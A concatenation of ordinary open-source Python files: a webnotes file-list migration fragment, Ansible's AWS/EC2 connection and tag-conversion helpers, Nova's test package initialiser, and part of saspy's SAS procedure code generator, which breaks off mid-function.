",".join((new_file_name, new_fid)) except Exception, e: # if duplicate entry, then dont update if e[0]!=1062: raise changed_keys = change_map.keys() for dt in webnotes.conn.sql("""select distinct parent from tabDocField where fieldname='file_list'"""): try: data = webnotes.conn.sql("""select name, file_list from `tab%s` where ifnull(file_list, '')!=''""" % dt[0]) for name, file_list in data: new_file_list = [] file_list = file_list.split("\n") for f in file_list: if f in changed_keys: new_file_list.append(change_map[f]) else: new_file_list.append(f) if new_file_list != file_list: webnotes.conn.sql("""update `tab%s` set file_list=%s where name=%s""" % (dt[0], "%s", "%s"), ("\n".join(new_file_list), name)) except Exception, e: if e[0]!=1146: raise
cuongnv23/ansible
refs/heads/devel
lib/ansible/module_utils/ec2.py
5
# This code is part of Ansible, but is an independent component. # This particular file snippet, and this file snippet only, is BSD licensed. # Modules you write using this snippet, which is embedded dynamically by Ansible # still belong to the author of the module, and may assign their own license # to the complete work. # # Copyright (c), Michael DeHaan <michael.dehaan@gmail.com>, 2012-2013 # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE # USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import os import re from time import sleep from ansible.module_utils._text import to_native from ansible.module_utils.cloud import CloudRetry try: import boto import boto.ec2 # boto does weird import stuff HAS_BOTO = True except ImportError: HAS_BOTO = False try: import boto3 import botocore HAS_BOTO3 = True except: HAS_BOTO3 = False from ansible.module_utils.six import string_types, binary_type, text_type class AnsibleAWSError(Exception): pass def _botocore_exception_maybe(): """ Allow for boto3 not being installed when using these utils by wrapping botocore.exceptions instead of assigning from it directly. """ if HAS_BOTO3: return botocore.exceptions.ClientError return type(None) class AWSRetry(CloudRetry): base_class = _botocore_exception_maybe() @staticmethod def status_code_from_exception(error): return error.response['Error']['Code'] @staticmethod def found(response_code, catch_extra_error_codes): # This list of failures is based on this API Reference # http://docs.aws.amazon.com/AWSEC2/latest/APIReference/errors-overview.html # # TooManyRequestsException comes from inside botocore when it # does retrys, unfortunately however it does not try long # enough to allow some services such as API Gateway to # complete configuration. At the moment of writing there is a # botocore/boto3 bug open to fix this. # # https://github.com/boto/boto3/issues/876 (and linked PRs etc) retry_on = [ 'RequestLimitExceeded', 'Unavailable', 'ServiceUnavailable', 'InternalFailure', 'InternalError', 'TooManyRequestsException', 'Throttling' ] if catch_extra_error_codes: retry_on.extend(catch_extra_error_codes) not_found = re.compile(r'^\w+.NotFound') return response_code in retry_on or not_found.search(response_code) def boto3_conn(module, conn_type=None, resource=None, region=None, endpoint=None, **params): try: return _boto3_conn(conn_type=conn_type, resource=resource, region=region, endpoint=endpoint, **params) except ValueError: module.fail_json(msg='There is an issue in the code of the module. You must specify either both, resource or client to the conn_type ' 'parameter in the boto3_conn function call') def _boto3_conn(conn_type=None, resource=None, region=None, endpoint=None, **params): profile = params.pop('profile_name', None) if conn_type not in ['both', 'resource', 'client']: raise ValueError('There is an issue in the calling code. You ' 'must specify either both, resource, or client to ' 'the conn_type parameter in the boto3_conn function ' 'call') if conn_type == 'resource': resource = boto3.session.Session(profile_name=profile).resource(resource, region_name=region, endpoint_url=endpoint, **params) return resource elif conn_type == 'client': client = boto3.session.Session(profile_name=profile).client(resource, region_name=region, endpoint_url=endpoint, **params) return client else: client = boto3.session.Session(profile_name=profile).client(resource, region_name=region, endpoint_url=endpoint, **params) resource = boto3.session.Session(profile_name=profile).resource(resource, region_name=region, endpoint_url=endpoint, **params) return client, resource boto3_inventory_conn = _boto3_conn def boto_exception(err): """ Extracts the error message from a boto exception. :param err: Exception from boto :return: Error message """ if hasattr(err, 'error_message'): error = err.error_message elif hasattr(err, 'message'): error = str(err.message) + ' ' + str(err) + ' - ' + str(type(err)) else: error = '%s: %s' % (Exception, err) return error def aws_common_argument_spec(): return dict( ec2_url=dict(), aws_secret_key=dict(aliases=['ec2_secret_key', 'secret_key'], no_log=True), aws_access_key=dict(aliases=['ec2_access_key', 'access_key']), validate_certs=dict(default=True, type='bool'), security_token=dict(aliases=['access_token'], no_log=True), profile=dict(), ) def ec2_argument_spec(): spec = aws_common_argument_spec() spec.update( dict( region=dict(aliases=['aws_region', 'ec2_region']), ) ) return spec def get_aws_connection_info(module, boto3=False): # Check module args for credentials, then check environment vars # access_key ec2_url = module.params.get('ec2_url') access_key = module.params.get('aws_access_key') secret_key = module.params.get('aws_secret_key') security_token = module.params.get('security_token') region = module.params.get('region') profile_name = module.params.get('profile') validate_certs = module.params.get('validate_certs') if not ec2_url: if 'AWS_URL' in os.environ: ec2_url = os.environ['AWS_URL'] elif 'EC2_URL' in os.environ: ec2_url = os.environ['EC2_URL'] if not access_key: if os.environ.get('AWS_ACCESS_KEY_ID'): access_key = os.environ['AWS_ACCESS_KEY_ID'] elif os.environ.get('AWS_ACCESS_KEY'): access_key = os.environ['AWS_ACCESS_KEY'] elif os.environ.get('EC2_ACCESS_KEY'): access_key = os.environ['EC2_ACCESS_KEY'] elif HAS_BOTO and boto.config.get('Credentials', 'aws_access_key_id'): access_key = boto.config.get('Credentials', 'aws_access_key_id') elif HAS_BOTO and boto.config.get('default', 'aws_access_key_id'): access_key = boto.config.get('default', 'aws_access_key_id') else: # in case access_key came in as empty string access_key = None if not secret_key: if os.environ.get('AWS_SECRET_ACCESS_KEY'): secret_key = os.environ['AWS_SECRET_ACCESS_KEY'] elif os.environ.get('AWS_SECRET_KEY'): secret_key = os.environ['AWS_SECRET_KEY'] elif os.environ.get('EC2_SECRET_KEY'): secret_key = os.environ['EC2_SECRET_KEY'] elif HAS_BOTO and boto.config.get('Credentials', 'aws_secret_access_key'): secret_key = boto.config.get('Credentials', 'aws_secret_access_key') elif HAS_BOTO and boto.config.get('default', 'aws_secret_access_key'): secret_key = boto.config.get('default', 'aws_secret_access_key') else: # in case secret_key came in as empty string secret_key = None if not region: if 'AWS_REGION' in os.environ: region = os.environ['AWS_REGION'] elif 'AWS_DEFAULT_REGION' in os.environ: region = os.environ['AWS_DEFAULT_REGION'] elif 'EC2_REGION' in os.environ: region = os.environ['EC2_REGION'] else: if not boto3: if HAS_BOTO: # boto.config.get returns None if config not found region = boto.config.get('Boto', 'aws_region') if not region: region = boto.config.get('Boto', 'ec2_region') else: module.fail_json(msg="boto is required for this module. Please install boto and try again") elif HAS_BOTO3: # here we don't need to make an additional call, will default to 'us-east-1' if the below evaluates to None. region = botocore.session.get_session().get_config_variable('region') else: module.fail_json(msg="Boto3 is required for this module. Please install boto3 and try again") if not security_token: if os.environ.get('AWS_SECURITY_TOKEN'): security_token = os.environ['AWS_SECURITY_TOKEN'] elif os.environ.get('AWS_SESSION_TOKEN'): security_token = os.environ['AWS_SESSION_TOKEN'] elif os.environ.get('EC2_SECURITY_TOKEN'): security_token = os.environ['EC2_SECURITY_TOKEN'] elif HAS_BOTO and boto.config.get('Credentials', 'aws_security_token'): security_token = boto.config.get('Credentials', 'aws_security_token') elif HAS_BOTO and boto.config.get('default', 'aws_security_token'): security_token = boto.config.get('default', 'aws_security_token') else: # in case secret_token came in as empty string security_token = None if HAS_BOTO3 and boto3: boto_params = dict(aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=security_token) boto_params['verify'] = validate_certs if profile_name: boto_params['profile_name'] = profile_name else: boto_params = dict(aws_access_key_id=access_key, aws_secret_access_key=secret_key, security_token=security_token) # only set profile_name if passed as an argument if profile_name: boto_params['profile_name'] = profile_name boto_params['validate_certs'] = validate_certs for param, value in boto_params.items(): if isinstance(value, binary_type): boto_params[param] = text_type(value, 'utf-8', 'strict') return region, ec2_url, boto_params def get_ec2_creds(module): ''' for compatibility mode with old modules that don't/can't yet use ec2_connect method ''' region, ec2_url, boto_params = get_aws_connection_info(module) return ec2_url, boto_params['aws_access_key_id'], boto_params['aws_secret_access_key'], region def boto_fix_security_token_in_profile(conn, profile_name): ''' monkey patch for boto issue boto/boto#2100 ''' profile = 'profile ' + profile_name if boto.config.has_option(profile, 'aws_security_token'): conn.provider.set_security_token(boto.config.get(profile, 'aws_security_token')) return conn def connect_to_aws(aws_module, region, **params): try: conn = aws_module.connect_to_region(region, **params) except(boto.provider.ProfileNotFoundError): raise AnsibleAWSError("Profile given for AWS was not found. Please fix and retry.") if not conn: if region not in [aws_module_region.name for aws_module_region in aws_module.regions()]: raise AnsibleAWSError("Region %s does not seem to be available for aws module %s. If the region definitely exists, you may need to upgrade " "boto or extend with endpoints_path" % (region, aws_module.__name__)) else: raise AnsibleAWSError("Unknown problem connecting to region %s for aws module %s." % (region, aws_module.__name__)) if params.get('profile_name'): conn = boto_fix_security_token_in_profile(conn, params['profile_name']) return conn def ec2_connect(module): """ Return an ec2 connection""" region, ec2_url, boto_params = get_aws_connection_info(module) # If we have a region specified, connect to its endpoint. if region: try: ec2 = connect_to_aws(boto.ec2, region, **boto_params) except (boto.exception.NoAuthHandlerFound, AnsibleAWSError, boto.provider.ProfileNotFoundError) as e: module.fail_json(msg=str(e)) # Otherwise, no region so we fallback to the old connection method elif ec2_url: try: ec2 = boto.connect_ec2_endpoint(ec2_url, **boto_params) except (boto.exception.NoAuthHandlerFound, AnsibleAWSError, boto.provider.ProfileNotFoundError) as e: module.fail_json(msg=str(e)) else: module.fail_json(msg="Either region or ec2_url must be specified") return ec2 def _camel_to_snake(name): def prepend_underscore_and_lower(m): return '_' + m.group(0).lower() import re # Cope with pluralized abbreviations such as TargetGroupARNs # that would otherwise be rendered target_group_ar_ns plural_pattern = r'[A-Z]{3,}s$' s1 = re.sub(plural_pattern, prepend_underscore_and_lower, name) # Handle when there was nothing before the plural_pattern if s1.startswith("_") and not name.startswith("_"): s1 = s1[1:] # Remainder of solution seems to be https://stackoverflow.com/a/1176023 first_cap_pattern = r'(.)([A-Z][a-z]+)' all_cap_pattern = r'([a-z0-9])([A-Z]+)' s2 = re.sub(first_cap_pattern, r'\1_\2', s1) return re.sub(all_cap_pattern, r'\1_\2', s2).lower() def camel_dict_to_snake_dict(camel_dict): def value_is_list(camel_list): checked_list = [] for item in camel_list: if isinstance(item, dict): checked_list.append(camel_dict_to_snake_dict(item)) elif isinstance(item, list): checked_list.append(value_is_list(item)) else: checked_list.append(item) return checked_list snake_dict = {} for k, v in camel_dict.items(): if isinstance(v, dict): snake_dict[_camel_to_snake(k)] = camel_dict_to_snake_dict(v) elif isinstance(v, list): snake_dict[_camel_to_snake(k)] = value_is_list(v) else: snake_dict[_camel_to_snake(k)] = v return snake_dict def snake_dict_to_camel_dict(snake_dict): def camelize(complex_type): if complex_type is None: return new_type = type(complex_type)() if isinstance(complex_type, dict): for key in complex_type: new_type[camel(key)] = camelize(complex_type[key]) elif isinstance(complex_type, list): for i in range(len(complex_type)): new_type.append(camelize(complex_type[i])) else: return complex_type return new_type def camel(words): return words.split('_')[0] + ''.join(x.capitalize() or '_' for x in words.split('_')[1:]) return camelize(snake_dict) def ansible_dict_to_boto3_filter_list(filters_dict): """ Convert an Ansible dict of filters to list of dicts that boto3 can use Args: filters_dict (dict): Dict of AWS filters. Basic Usage: >>> filters = {'some-aws-id', 'i-01234567'} >>> ansible_dict_to_boto3_filter_list(filters) { 'some-aws-id': 'i-01234567' } Returns: List: List of AWS filters and their values [ { 'Name': 'some-aws-id', 'Values': [ 'i-01234567', ] } ] """ filters_list = [] for k, v in filters_dict.items(): filter_dict = {'Name': k} if isinstance(v, string_types): filter_dict['Values'] = [v] else: filter_dict['Values'] = v filters_list.append(filter_dict) return filters_list def boto3_tag_list_to_ansible_dict(tags_list, tag_name_key_name='Key', tag_value_key_name='Value'): """ Convert a boto3 list of resource tags to a flat dict of key:value pairs Args: tags_list (list): List of dicts representing AWS tags. tag_name_key_name (str): Value to use as the key for all tag keys (useful because boto3 doesn't always use "Key") tag_value_key_name (str): Value to use as the key for all tag values (useful because boto3 doesn't always use "Value") Basic Usage: >>> tags_list = [{'Key': 'MyTagKey', 'Value': 'MyTagValue'}] >>> boto3_tag_list_to_ansible_dict(tags_list) [ { 'Key': 'MyTagKey', 'Value': 'MyTagValue' } ] Returns: Dict: Dict of key:value pairs representing AWS tags { 'MyTagKey': 'MyTagValue', } """ tags_dict = {} for tag in tags_list: if tag_name_key_name in tag: tags_dict[tag[tag_name_key_name]] = tag[tag_value_key_name] return tags_dict def ansible_dict_to_boto3_tag_list(tags_dict, tag_name_key_name='Key', tag_value_key_name='Value'): """ Convert a flat dict of key:value pairs representing AWS resource tags to a boto3 list of dicts Args: tags_dict (dict): Dict representing AWS resource tags. tag_name_key_name (str): Value to use as the key for all tag keys (useful because boto3 doesn't always use "Key") tag_value_key_name (str): Value to use as the key for all tag values (useful because boto3 doesn't always use "Value") Basic Usage: >>> tags_dict = {'MyTagKey': 'MyTagValue'} >>> ansible_dict_to_boto3_tag_list(tags_dict) { 'MyTagKey': 'MyTagValue' } Returns: List: List of dicts containing tag keys and values [ { 'Key': 'MyTagKey', 'Value': 'MyTagValue' } ] """ tags_list = [] for k, v in tags_dict.items(): tags_list.append({tag_name_key_name: k, tag_value_key_name: to_native(v)}) return tags_list def get_ec2_security_group_ids_from_names(sec_group_list, ec2_connection, vpc_id=None, boto3=True): """ Return list of security group IDs from security group names. Note that security group names are not unique across VPCs. If a name exists across multiple VPCs and no VPC ID is supplied, all matching IDs will be returned. This will probably lead to a boto exception if you attempt to assign both IDs to a resource so ensure you wrap the call in a try block """ def get_sg_name(sg, boto3): if boto3: return sg['GroupName'] else: return sg.name def get_sg_id(sg, boto3): if boto3: return sg['GroupId'] else: return sg.id sec_group_id_list = [] if isinstance(sec_group_list, string_types): sec_group_list = [sec_group_list] # Get all security groups if boto3: if vpc_id: filters = [ { 'Name': 'vpc-id', 'Values': [ vpc_id, ] } ] all_sec_groups = ec2_connection.describe_security_groups(Filters=filters)['SecurityGroups'] else: all_sec_groups = ec2_connection.describe_security_groups()['SecurityGroups'] else: if vpc_id: filters = {'vpc-id': vpc_id} all_sec_groups = ec2_connection.get_all_security_groups(filters=filters) else: all_sec_groups = ec2_connection.get_all_security_groups() unmatched = set(sec_group_list).difference(str(get_sg_name(all_sg, boto3)) for all_sg in all_sec_groups) sec_group_name_list = list(set(sec_group_list) - set(unmatched)) if len(unmatched) > 0: # If we have unmatched names that look like an ID, assume they are import re sec_group_id_list[:] = [sg for sg in unmatched if re.match('sg-[a-fA-F0-9]+$', sg)] still_unmatched = [sg for sg in unmatched if not re.match('sg-[a-fA-F0-9]+$', sg)] if len(still_unmatched) > 0: raise ValueError("The following group names are not valid: %s" % ', '.join(still_unmatched)) sec_group_id_list += [str(get_sg_id(all_sg, boto3)) for all_sg in all_sec_groups if str(get_sg_name(all_sg, boto3)) in sec_group_name_list] return sec_group_id_list def sort_json_policy_dict(policy_dict): """ Sort any lists in an IAM JSON policy so that comparison of two policies with identical values but different orders will return true Args: policy_dict (dict): Dict representing IAM JSON policy. Basic Usage: >>> my_iam_policy = {'Principle': {'AWS':["31","7","14","101"]} >>> sort_json_policy_dict(my_iam_policy) Returns: Dict: Will return a copy of the policy as a Dict but any List will be sorted { 'Principle': { 'AWS': [ '7', '14', '31', '101' ] } } """ def value_is_list(my_list): checked_list = [] for item in my_list: if isinstance(item, dict): checked_list.append(sort_json_policy_dict(item)) elif isinstance(item, list): checked_list.append(value_is_list(item)) else: checked_list.append(item) # Sort list. If it's a list of dictionaries, sort by tuple of key-value # pairs, since Python 3 doesn't allow comparisons such as `<` between dictionaries. checked_list.sort(key=lambda x: sorted(x.items()) if isinstance(x, dict) else x) return checked_list ordered_policy_dict = {} for key, value in policy_dict.items(): if isinstance(value, dict): ordered_policy_dict[key] = sort_json_policy_dict(value) elif isinstance(value, list): ordered_policy_dict[key] = value_is_list(value) else: ordered_policy_dict[key] = value return ordered_policy_dict def map_complex_type(complex_type, type_map): """ Allows to cast elements within a dictionary to a specific type Example of usage: DEPLOYMENT_CONFIGURATION_TYPE_MAP = { 'maximum_percent': 'int', 'minimum_healthy_percent': 'int' } deployment_configuration = map_complex_type(module.params['deployment_configuration'], DEPLOYMENT_CONFIGURATION_TYPE_MAP) This ensures all keys within the root element are casted and valid integers """ if complex_type is None: return new_type = type(complex_type)() if isinstance(complex_type, dict): for key in complex_type: if key in type_map: if isinstance(type_map[key], list): new_type[key] = map_complex_type( complex_type[key], type_map[key][0]) else: new_type[key] = map_complex_type( complex_type[key], type_map[key]) else: return complex_type elif isinstance(complex_type, list): for i in range(len(complex_type)): new_type.append(map_complex_type( complex_type[i], type_map)) elif type_map: return globals()['__builtins__'][type_map](complex_type) return new_type def compare_aws_tags(current_tags_dict, new_tags_dict, purge_tags=True): """ Compare two dicts of AWS tags. Dicts are expected to of been created using 'boto3_tag_list_to_ansible_dict' helper function. Two dicts are returned - the first is tags to be set, the second is any tags to remove. Since the AWS APIs differ t hese may not be able to be used out of the box. :param current_tags_dict: :param new_tags_dict: :param purge_tags: :return: tag_key_value_pairs_to_set: a dict of key value pairs that need to be set in AWS. If all tags are identical this dict will be empty :return: tag_keys_to_unset: a list of key names (type str) that need to be unset in AWS. If no tags need to be unset this list will be empty """ tag_key_value_pairs_to_set = {} tag_keys_to_unset = [] for key in current_tags_dict.keys(): if key not in new_tags_dict and purge_tags: tag_keys_to_unset.append(key) for key in set(new_tags_dict.keys()) - set(tag_keys_to_unset): if new_tags_dict[key] != current_tags_dict.get(key): tag_key_value_pairs_to_set[key] = new_tags_dict[key] return tag_key_value_pairs_to_set, tag_keys_to_unset
SUSE-Cloud/nova
refs/heads/stable/havana
nova/tests/__init__.py
13
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ :mod:`nova.tests` -- Nova Unittests ===================================================== .. automodule:: nova.tests :platform: Unix """ # TODO(mikal): move eventlet imports to nova.__init__ once we move to PBR import os import sys # NOTE(mikal): All of this is because if dnspython is present in your # environment then eventlet monkeypatches socket.getaddrinfo() with an # implementation which doesn't work for IPv6. What we're checking here is # that the magic environment variable was set when the import happened. if ('eventlet' in sys.modules and os.environ.get('EVENTLET_NO_GREENDNS', '').lower() != 'yes'): raise ImportError('eventlet imported before nova/cmd/__init__ ' '(env var set to %s)' % os.environ.get('EVENTLET_NO_GREENDNS')) os.environ['EVENTLET_NO_GREENDNS'] = 'yes' import eventlet eventlet.monkey_patch(os=False)
jld23/saspy
refs/heads/master
saspy/sasproccommons.py
1
# # Copyright SAS Institute # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging import warnings import re from collections import OrderedDict from saspy.sasdata import SASdata from saspy.sasresults import SASresults # from pdb import set_trace as bp class Codegen(object): """ Class to generate code for submission to the SAS system. """ def __init__(self, key, args, **kwargs): self._key = key self._args = args @property def key(self): return self._key @property def codestmt(self): args = self._args key = self._key if self._key in ['code', 'save'] and isinstance(self._args, str): args = "file = '{}'".format(args) if self._key in ['output', 'out'] and isinstance(self._args, str): if not len(self.outmeth): if bool(re.match(r'(\bout\W*=+)',args, flags=re.IGNORECASE)): return "output {};\n".format(args) else: return "output out= {};\n".format(args) return args if self._key in ['selection'] and isinstance(self._args, str): if self._args.lower().strip() in ['none', 'forward', 'backward', 'stepwise', 'forwardswap','lar', 'lasso']: if len(self._args.split()) == 1: return "selection method={};\n".format(self._args) else: raise SyntaxError("selection method: '{}' is not valid".format(self._args)) if self._key in ['freq', 'weight'] and len(args.split()) > 1: raise SyntaxError('ERROR in code submission. {} can only have one variable and you submitted: {}'.format(self._key, args)) if isinstance(self._args, (list, tuple)): args = " ".join(self._args) if len(self._args) < 1: raise SyntaxError("The {} list has no members".format(self._key)) elif isinstance(self._args, bool): if self._args == False: return '' if self._key in ['level', 'estimate', 'irregular', 'slope', 'autotune']: args = '' elif self._key == 'partition': return "partition fraction(test=0 validation=.30 seed=9878);\n" elif self._key in ['save']: return "{0} {2}={1}.{2} {3}={1}.{3} {4}={1}.{4} {5}={1}.{5} {6}={1}.{6};\n"\ .format(self._key, self.objname, "fit", "importance", "model", "nodestats", "rules" ) elif self._key in ['out', 'output']: if not len(self.outmeth): return "output out={}.{};\n".format(self.objname, '_output') return '{}.{}'.format(self.objname, '_output') elif isinstance(self._args, dict): try: c = '' length = 0 for k,v in self._args.items(): if k not in ['interval', 'nominal']: raise KeyError keystr = k if self.objtype.casefold() == 'hpneural': if keystr == 'interval': keystr = 'int' else: keystr = 'nom' if isinstance(v, str): if self._key.casefold() == 'target': length += len(v.split()) c += "{0} {1} /level={2};\n".format(self._key, self._args[k], keystr) elif isinstance(self._args[k], (list, tuple)): if self._key.casefold() == 'target': length += len(v) c += "{0} {1} /level={2};\n".format(self._key, " ".join(self._args[k]), keystr) if self._key.casefold() == 'target' and not length==1: raise SyntaxError return c except SyntaxError: print("SyntaxError: TARGET can only have one variable") except KeyError: if self._key.casefold() == 'selection': if bool(self._args): # is the dictionary empty m = self._args.pop('method', '') me = self._args.pop('maxeffects', None) if me is not None: if int(me) > 0 and m != 'backward': self._args['maxeffects'] = me d = self._args.pop('details', '') dstr = '' if len(d) > 0: dstr = 'details = %s' % d return "selection method={} ({}) {}\n;".format(m, ' '.join('{}={}'.format(key, val) for key, val in self._args.items()), dstr) if self.objtype.lower() == 'hpneural' and self._key.casefold() == 'train' and all(k in self._args for k in ("numtries", "maxiter")): return "train numtries={} maxiter={};\n".format(self._args['numtries'], self._args['maxiter']) if self.objtype.lower() == 'nnet' and self._key.casefold() == 'train': return "{0} {1};\n".format(self._key, ' '.join('{}={}'.format(key, val) for key, val in self._args.items())) if self._key.casefold() == 'out' and not len(self.outmeth): return "output out={}.{}\n;".format(self._args.libref, self._args.table) if self._key.casefold() == 'save' and self.objtype == 'treeboost': return '{} %s ;\n'.format(self._key) % ' '.join('{} = {}'.format(key, val) for key, val in self._args.items()) if self._key.casefold() == 'impute': usedVars = [] tup_code = '' contantValues = self._args.pop('value', None) if contantValues is not None: if not all(isinstance(x, tuple) for x in contantValues): raise SyntaxError("The elements in the 'value' key must be tuples") for t in contantValues: tup_code += "impute %s / value = %s;\n" % (t[0], t[1]) usedVars.append(t[0]) meth_code = '' for key, values in self._args.items(): for v in values: meth_code += 'impute %s / method = %s;\n' % (v, key) usedVars.append(v) return '\ninput ' + ' '.join(list(set(usedVars))) + ';\n' + tup_code + meth_code + 'run;' print("KeyError: Proper keys not found for {} dictionary: {}".format(self._key, args)) elif isinstance(self._args, SASdata): key = "{} =".format(self._key) args = "{}.{}".format(self._args.libref, self._args.table) if self._key in ['out','output']: return 'output out={}.{}\n;'.format(self._args.libref, self._args.table) if self._key == 'score': if self.objtype.casefold() == 'hp4score': return "score out={}.{}\n;".format(self._args.libref, self._args.table) elif self.objtype.casefold() == 'tpspline': return "score data={0}.{1} out={2}.{3}\n;".format(self.data.libref, self.data.table, self._args.libref, self._args.table) return "score out={}.{}\n;".format(self._args.libref, self._args.table) elif self._key == 'savestate': return "{} rstore = {}.{}\n;".format(key, self._args.libref, self._args.table) elif self._key in ['output', 'out']: if len(self.outmeth): return "{} out = {};\n".format(self._key, args) return "{}.{}".format(self._args.libref, self._args.table) if self._key in ['stmtpassthrough', 'prog_stmts']: return "{0} ;\n".format(args) if self._key =='cls': key = 'class' return "{0} {1};\n".format(key, args) @property def debug(self): if isinstance(self._args, str): return "{0} statement,length: {1},{2}\n".format( self._key, self._args, len(self._args)) elif isinstance(self._args, (list, tuple)): return "list:{}\n".format(self._args) @classmethod def new(cls, key, args): return cls(key, args) class SASProcCommons: def __init__(self, session, *args, **kwargs): # logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.DEBUG) self.logger = logging.getLogger(__name__) self.logger.setLevel(logging.WARN) self.sas = session self.logger.debug("Initialization of SAS Macro: " + self.sas.saslog()) @staticmethod def _errorLog(log): if isinstance(log, str): lines = re.split(r'[\n]\s*', log) i = 0 elog = [] for line in lines: i += 1 e = [] if line.startswith('ERROR'): e = lines[(max(i - 1, 0)):(min(i + 0, len(lines)))] elog = elog + e return "\n".join(elog) else: raise SyntaxError("log is not a string but type:%s" % (str(type(log)))) def _makeProcCallMacro(self, objtype: str, objname: str, data: ['SASdata', str] = None, args: dict = None) -> str: """ This method generates the SAS code from the python objects and included data and arguments. The list of args in this method is largely alphabetical but there are exceptions in order to satisfy the order needs of the statements for the procedure. as an example... http://support.sas.com/documentation/cdl/en/statug/68162/HTML/default/viewer.htm#statug_glm_syntax.htm#statug.glm.glmpostable :param objtype: str -- proc name :param objname: str -- 3 digit code for proc :param data: sas dataset object :param args: dict -- proc arguments :return: str -- the SAS code needed to execute on the server """ plot = '' outmeth = '' procopts = args.pop('procopts', '') # Set ODS graphic generation to True by default ODSGraphics = args.get('ODSGraphics', True) # The different SAS products vary slightly in plotting and out methods. # this block sets the options correctly for plotting and output statements if self.sasproduct.lower() == 'stat' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): plot = 'plot=all' if self.sasproduct.lower() == 'qc': pass if self.sasproduct.lower() == 'ets' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): outmeth = 'out' plot = 'plot=all' if self.sasproduct.lower() == 'em': pass if self.sasproduct.lower() == 'vddml': outmeth = 'out' if self.sasproduct.lower() == 'util': outmeth = 'out' if objtype.lower() =='univariate' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): plot = 'plot' outmeth = '' outds = args.pop('out', None) if outds == None: outds = args.pop('output', None) outcodegen = Codegen.new('out', outds) outcodegen.outmeth = outmeth outcodegen.objname = objname outstr = outcodegen.codestmt self.logger.debug("product caller: " + self.sasproduct.lower()) debug_code= '' code = "%macro proccall(d);\n" # resolve issues withe Proc options, out= and plots= # The procopts statement should be in every procedure as a way to pass arbitrary options to the procedures if 'outmeth' in args: outmeth = args['outmeth'] if 'plot' in args: plot = args['plot'] if len(outmeth) and not outds == None: #outstr = outds.libref + '.' + outds.table code += "proc %s data=%s.%s%s %s %s=%s %s ;\n" % ( objtype, data.libref, data.table, data._dsopts(), plot, outmeth, outstr, procopts) else: code += "proc %s data=%s.%s%s %s %s ;\n" % ( objtype, data.libref, data.table, data._dsopts(), plot, procopts) if outds is not None: args['output'] = outds self.logger.debug("args value: " + str(args)) self.logger.debug("args type: " + str(type(args))) # this list is largely alphabetical but there are exceptions in order to # satisfy the order needs of the statements for the procedures # as an example... # http://support.sas.com/documentation/cdl/en/statug/68162/HTML/default/viewer.htm#statug_glm_syntax.htm#statug.glm.glmpostable uoargs = {} orderedargs = {} keyorder = ['by', 'input', 'target', 'cls', 'model', 'output'] for k, v in args.items(): if k in keyorder: orderedargs[k] = v else: uoargs[k] = v orderedargs = OrderedDict(sorted(orderedargs.items(), key=lambda i: keyorder.index(i[0]))) for k, v in uoargs.items(): orderedargs[k] = v orderedargs.move_to_end(k) for key, value in orderedargs.items(): gen = Codegen.new(key, value) gen.objtype = objtype gen.data = data gen.outmeth = outmeth gen.objname = objname code += gen.codestmt if gen.debug is not None: debug_code += gen.debug code += "run; quit; %mend;\n" code += "%%mangobj(%s,%s,%s);" % (objname, objtype, data.table) if self.logger.level == 10: print("Proc code submission:\n " + str(code)) print("\n\n\n" + debug_code) return code def _objectmethods(self, obj: str, *args) -> list: """ This method parses the SAS log for artifacts (tables and graphics) that were created from the procedure method call :param obj: str -- proc object :param args: list likely none :return: list -- the tables and graphs available for tab complete """ code = "%listdata(" code += obj code += ");" self.logger.debug("Object Method macro call: " + str(code)) res = self.sas.submit(code, "text") meth = res['LOG'].splitlines() for i in range(len(meth)): meth[i] = meth[i].lstrip().rstrip() self.logger.debug('SAS Log: ' + res['LOG']) objlist = meth[meth.index('startparse9878') + 1:meth.index('endparse9878')] self.logger.debug("PROC attr list: " + str(objlist)) return objlist def _charlist(self, data) -> list: """ Private method to return the variables in a SAS Data set that are of type char :param data: SAS Data object to process :return: list of character variables :rtype: list """ # Get list of character variables to add to nominal list char_string = """ data _null_; file LOG; d = open('{0}.{1}'); nvars = attrn(d, 'NVARS'); put 